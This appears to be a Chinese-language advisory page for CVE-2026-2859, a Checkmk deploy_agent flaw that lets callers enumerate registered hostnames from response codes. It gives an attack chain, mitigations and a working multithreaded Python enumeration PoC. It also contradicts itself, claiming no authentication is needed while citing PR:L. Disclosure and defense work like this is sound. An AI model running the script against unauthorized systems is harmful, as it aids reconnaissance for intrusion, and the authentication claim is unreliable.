CVE-2026-2859 Checkmk deploy_agent端点权限控制不当导致主机枚举信息泄露

漏洞信息

漏洞编号

CVE-2026-2859

漏洞类型

权限控制不当/信息泄露

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Checkmk

漏洞概述

CVE-2026-2859是Checkmk监控软件中的一个权限控制不当漏洞。该漏洞存在于deploy_agent端点，由于对主机存在性检查的权限验证不充分，攻击者可以通过观察不同的HTTP响应码来枚举系统中已注册的主机名称。漏洞影响Checkmk多个版本，包括2.4.0至2.4.0p22、2.3.0至2.3.0p42以及2.2.0版本。攻击者无需认证即可利用此漏洞，通过构造特定的HTTP请求到deploy_agent端点，根据响应状态码的差异（如404表示主机不存在，200或其他状态码表示主机存在）来探测目标环境中部署的主机列表。这种信息泄露可能导致敏感基础设施信息暴露，为进一步攻击提供情报支持。漏洞CVSS评分4.3，属于中危级别，主要影响系统的机密性。

技术细节

该漏洞的技术根源在于Checkmk的deploy_agent端点对主机枚举请求的权限验证机制存在缺陷。攻击者可以通过向该端点发送HTTP GET或POST请求，在请求参数中指定目标主机名，系统会根据主机是否存在返回不同的HTTP状态码。具体而言，当请求的主机名在Checkmk系统中不存在时，服务器返回404 Not Found状态码；而当主机名存在时，系统可能返回200 OK或其他状态码。这种基于响应差异的信息泄露允许未经身份验证的攻击者通过自动化脚本大规模枚举目标环境中已注册的主机名称。攻击者可以利用此信息绘制目标网络的基础设施拓扑，了解监控系统的覆盖范围，进而为后续针对性攻击（如供应链攻击或横向移动）提供有价值的情报。漏洞的CVSS向量显示攻击复杂度低（AC:L），无需特殊权限（PR:L），但不需要用户交互（UI:N），主要造成机密性影响（C:L）。

攻击链分析

STEP 1

步骤1

信息收集阶段：攻击者识别目标Checkmk实例，获取其部署的deploy_agent端点URL，通常位于/check_mk/deploy_agent.py路径

STEP 2

步骤2

构造探测请求：攻击者构造HTTP GET请求，在host参数中填充待测试的主机名，如host=target-server-01

STEP 3

步骤3

响应码分析：攻击者发送请求并分析HTTP响应状态码。当主机不存在时返回404，主机存在时返回200或其他状态码

STEP 4

步骤4

自动化枚举：使用脚本或工具自动化执行大量主机名探测，结合常见命名规则和字典进行大规模枚举

STEP 5

步骤5

情报整理：收集所有有效主机名，构建目标基础设施清单，为后续攻击（如针对特定主机的漏洞利用或社会工程）做准备

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2026-2859 PoC - Checkmk Host Enumeration via deploy_agent Endpoint
This PoC demonstrates how an unauthenticated attacker can enumerate
valid hostnames in Checkmk by observing different HTTP response codes.
"""

import requests
import argparse
import json
import sys
from concurrent.futures import ThreadPoolExecutor, as_completed

def check_host(target_url, hostname):
    """
    Check if a hostname exists in Checkmk by observing HTTP response codes.
    Returns True if host appears to exist, False otherwise.
    """
    try:
        # Try the deploy_agent endpoint with the target hostname
        url = f"{target_url.rstrip('/')}/check_mk/deploy_agent.py"
        params = {'host': hostname}
        response = requests.get(url, params=params, timeout=10, verify=False)
        
        # Different response codes indicate host existence
        # 404 typically means host doesn't exist
        # 200 or other codes may indicate host exists
        if response.status_code == 404:
            return {'hostname': hostname, 'exists': False, 'status_code': 404}
        else:
            return {'hostname': hostname, 'exists': True, 'status_code': response.status_code}
    except requests.RequestException as e:
        return {'hostname': hostname, 'exists': None, 'error': str(e)}

def enumerate_hosts(target_url, hostnames_file=None, wordlist=None):
    """
    Enumerate hosts in Checkmk using a wordlist or file.
    """
    # Default wordlist with common hostnames
    default_wordlist = [
        'localhost', 'server', 'server01', 'server02', 'webserver',
        'dbserver', 'database', 'mail', 'proxy', 'firewall', 'router',
        'switch', 'printer', 'monitor', 'gateway', 'backup', 'nas',
        'vmware', 'esxi', 'hyperv', 'kvm', 'docker', 'kubernetes'
    ]
    
    if hostnames_file:
        try:
            with open(hostnames_file, 'r') as f:
                wordlist = [line.strip() for line in f if line.strip()]
        except Exception as e:
            print(f"Error reading file: {e}")
            wordlist = default_wordlist
    else:
        wordlist = wordlist or default_wordlist
    
    print(f"[*] Enumerating hosts on {target_url}")
    print(f"[*] Testing {len(wordlist)} hostnames...")
    
    found_hosts = []
    
    with ThreadPoolExecutor(max_workers=10) as executor:
        futures = {executor.submit(check_host, target_url, host): host 
                   for host in wordlist}
        
        for future in as_completed(futures):
            result = future.result()
            if result['exists']:
                print(f"[+] Found host: {result['hostname']} (Status: {result['status_code']})")
                found_hosts.append(result)
            elif result['exists'] is False:
                print(f"[-] Not found: {result['hostname']}")
    
    print(f"\n[*] Enumeration complete. Found {len(found_hosts)} hosts.")
    return found_hosts

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='CVE-2026-2859 Checkmk Host Enumeration PoC')
    parser.add_argument('-t', '--target', required=True, help='Target Checkmk URL')
    parser.add_argument('-f', '--file', help='File containing hostnames to test')
    parser.add_argument('-w', '--wordlist', nargs='+', help='Wordlist of hostnames')
    
    args = parser.parse_args()
    
    # Disable SSL warnings for testing
    requests.packages.urllib3.disable_warnings()
    
    results = enumerate_hosts(args.target, args.file, args.wordlist)
    
    # Save results to JSON
    output_file = 'cve_2026_2859_results.json'
    with open(output_file, 'w') as f:
        json.dump(results, f, indent=2)
    print(f"[*] Results saved to {output_file}")

影响范围

Checkmk 2.4.0 - 2.4.0p22

Checkmk 2.3.0 - 2.3.0p42

Checkmk 2.2.0 (已停止维护)

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1) 通过Web应用防火墙(WAF)规则限制对/check_mk/deploy_agent.py路径的访问，只允许授权IP访问；2) 实施速率限制防止自动化主机枚举攻击；3) 审查并限制Checkmk的公开暴露面，避免将管理界面直接暴露在互联网；4) 启用Checkmk的审计日志功能，监控异常的deploy_agent请求模式；5) 考虑使用网络分段策略，将监控系统的管理接口与生产网络隔离。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-2859
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-2859
3 Details https://www.cvedetails.com/cve/CVE-2026-2859/
4 VulDB https://vuldb.com/cve/CVE-2026-2859
5 Link https://checkmk.com/werk/18994